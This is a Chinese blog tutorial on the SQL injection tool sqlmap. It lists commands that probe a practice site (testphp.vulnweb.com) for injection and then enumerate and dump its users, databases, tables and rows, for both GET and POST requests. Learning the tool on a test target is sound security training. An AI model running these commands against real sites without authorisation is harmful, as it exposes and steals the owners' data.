工具|sqlmap

最新推荐文章于 2024-05-15 17:50:57 发布
最新推荐文章于 2024-05-15 17:50:57 发布
阅读量161 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42254745/article/details/105514478
版权

文章目录

安装大坑

首先我想说的是目前sqlmap已经支持python2.x/3.x了,所以不必要为了sqlmap单独去配置环境。另外一点,作为初学者,我在使用中遇到了一个我以为是问题的问题,实际上是正常情况。希望后来者看到这篇博客都可以避免在这个问题上浪费时间。
进入正题,当我们正确安装python环境sqlmap之后,我们肯定就会去尝试打开sqlmap。Win+R打开运行,输入cmd,点击确定我们就可以成功进入dos。
在这里插入图片描述
然后我们把目录定位到sqlmap的目录,然后输入python sqlmap.py,回车。然后会惊讶的发现:
在这里插入图片描述
提示报错,然后我就去百度了,百度到一堆解决方法,我挨个去试了之后发现并没有什么用,于是我就放弃了。去看了sqlmap的文档,发现原来这样的提示其实表示已经安装运行成功了,因为调用sqlmap其实是需要加后缀参数的,就像这样:
在这里插入图片描述
这样就执行成功啦。怪也只怪我太蠢,知乎第一大准则“先问是不是再问为什么”都给忘了。

sql基本操作

-h,–help,-hh:用于获取帮助(小技巧:字母缩写前一个-,完整单词是两个–)

-u “目标URL”:用于判断是否为注入点

实战(test)

GET型注入方式

我们以http://testphp.vulnweb.com/search.php为例,简单地进行一个实战的测试。首先我们输入

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query"

在这里插入图片描述
红框部分就是sqlmap分析出的sql注入的类型,那如何读取更多信息呢,我们输入:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --users

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bUr3XsK7-1586859963655)(C:\Users\zhuso\AppData\Roaming\Typora\typora-user-images\image-20200414164044036.png)]

红框部分即为我们可以读取的用户的信息。

也可以使用:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dbs

在这里插入图片描述

红框部分即为我们可以读取的数据库列表。

数据库比较多和用户比较多的时候,我们还需要查看当前该用户所在的数据库,我们可以执行:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --current-user --current-db

在这里插入图片描述

红框部分即为我们得到的数据库民和用户名。接下来我们读取数据库的表信息:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --tables -D "acuart"

在这里插入图片描述

红框处即为我们读取的数据库表的列表。接下来我们读取数据库中具体数据。首先读取数据表中的列信息:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --columns -T "categ" -D "acuart"

在这里插入图片描述

红框处即为我们读出的列信息。接下来我们读取具体的表中的数据。首先我们来看一下表中具体有多少条数据:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --count -T "categ" -D "acuart"

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LkYhwbN3-1586859963657)(C:\Users\zhuso\AppData\Roaming\Typora\typora-user-images\image-20200414165219986.png)]

红框处显示了表中有四条数据。我们接下来下载表中具体数据:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dump -T "categ" -D "acuart"

在这里插入图片描述

这里既是我们下载到的表内容。如果只想读取其中的部分,我们可以执行:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dump -T "categ" -D "acuart" --start 2 --stop 3

如果需要下载指定数据库中的所有表,可以执行:

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dump-all -D "acuart"

POST型注入方式

如果我们保存了在抓包软件中抓取的POST型数据,我们则可以执行:

python sqlmap.py -r "E:\WEB安全\工具大全\sqlmap\抓包\post.txt"

或者如果我们找到了POST提交的页面,我们则可以执行:

python sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data="
uname=test&pass=test"

好了,今天的讲解就到这里了,是不是非常的Clever呢?请大家多多指教~~

嵩。
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqlmap工具
学习、分享、交流
05-29 1366
sqlmap工具:专门用于sql注入漏洞的。
SQLmap工具介绍及其使用
weixin_33748818的博客
05-11 222
http://sqlmap.sourceforge.net/这是SEVEN大哥写的!:从黑防上看到他们说是有什么内部的工具,国外的注入工具,python的。想下载看看,结果是vip工具。就从百度上搜索,没有发现。看来在国内还没有流行。就直接去google上搜索去了。结果发现了这个工具。功能非常强大。我以前的想法,这个工具全都实现了。而且功能更强。新一代的强大工具。我...
python | sqlmap,一个实用的 Python 库!
最新发布
csdn_xmj的博客
05-15 965
sqlmap是一个强大的自动化SQL注入工具,专为检测、利用和管理数据库的SQL注入漏洞设计。它支持广泛的数据库系统,能自动识别注入点,并通过多种技术执行详尽的数据库、表、数据提取。sqlmap的功能包括获取数据库版本信息、数据提取、访问底层文件系统和执行远程命令,甚至允许植入后门。该工具不仅适用于网络安全专家进行安全审计和渗透测试,也广泛用于安全教育和培训,帮助了解和防范SQL注入攻击。通过其命令行界面和API,sqlmap为自动化测试提供了极大的便利,是网络安全领域中不可或缺的工具
SQLMAP工具详解
weixin_56218159的博客
06-02 7492
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
sqlmap工具的使用 (超详细附工具版)
读书 买花 长大
06-11 3196
sqlmap
安全测试必备工具——SQLMap 安装及基本应用
朱雀随云记的博客
04-30 882
输入:python sqlmap.py -u http://192.168.253.137/vulnerabilities/sqli/?3、进入解压后的目录,在显示目录路径位置输入cmd回车,在弹出的命令行窗口,输入 python sqlmap.py即开启工具使用。运行过程中需要用户输入y/n才能进入下一步操作,如果希望跳过这些,可以在命令末尾加 --batch。2、将下载好的sqlmap-master.zip压缩包,解压到自己需要的目录。--current-db:获取当前数据库。
sqlmap工具
11-26
SQLMap是一款强大的、自动化SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它能够帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库层面的安全弱点,而无需深入掌握SQL语言的复杂性。 1...
sqlmap渗透工具
07-06
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员有效地发现和利用网站应用程序中的数据库安全漏洞。在Python环境中运行,SQLMap提供了一系列...
sqlmap自动扫描工具
06-14
SQLMap是一款广泛使用的开源自动化SQL注入工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器中的安全漏洞。下面将详细介绍SQLMap的工作原理、功能...
sqlmap 渗透测试工具
04-16
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库...
sqlmap图形化工具
09-19
Python 和 SQLMAP 依赖 将repo拷贝到你的机器 编辑sqlmap/inc/config.php配置文件...启动sqlmap API服务(python /home/user/tools/sqlmap/sqlmapapi.py -s) 通过浏览器访问Web应用 (http://127.0.0.1/sqlmap/index.php)
sqlmap+python
10-23
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 资源包括sqlmap和运行所需的python安装包
sqlmap+python2.7.1
10-16
sqlmap注入安装程序,主要包含python2.7.1版本以及sqlmap包。
使用sqlmap工具测试网站安全性(sql注入等)
zhumengstyle的博客
02-07 4981
sqlmap工具的正常使用依赖python,所以要先安装python。 python下载地址:https://www.python.org/(下载2.7版本的) sqlmap下载地址:http://sqlmap.org/ 这两个安装好之后,把路径写入环境变量,便于使用。 1. sql注入检测 A.【get方式请求的地址】不需要登录时,使用(sqlmap.py -u “测试访问地址”)即可
sqlmap渗透测试工具用户指南
"sqlmap用户手册是一份详细的技术文档,主要介绍了开源的渗透测试工具sqlmap的使用方法和功能。该工具自动检测并利用SQL注入漏洞,接管数据库服务器。手册包含强大的检测引擎、多种专有功能,适用于高级渗透测试者,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值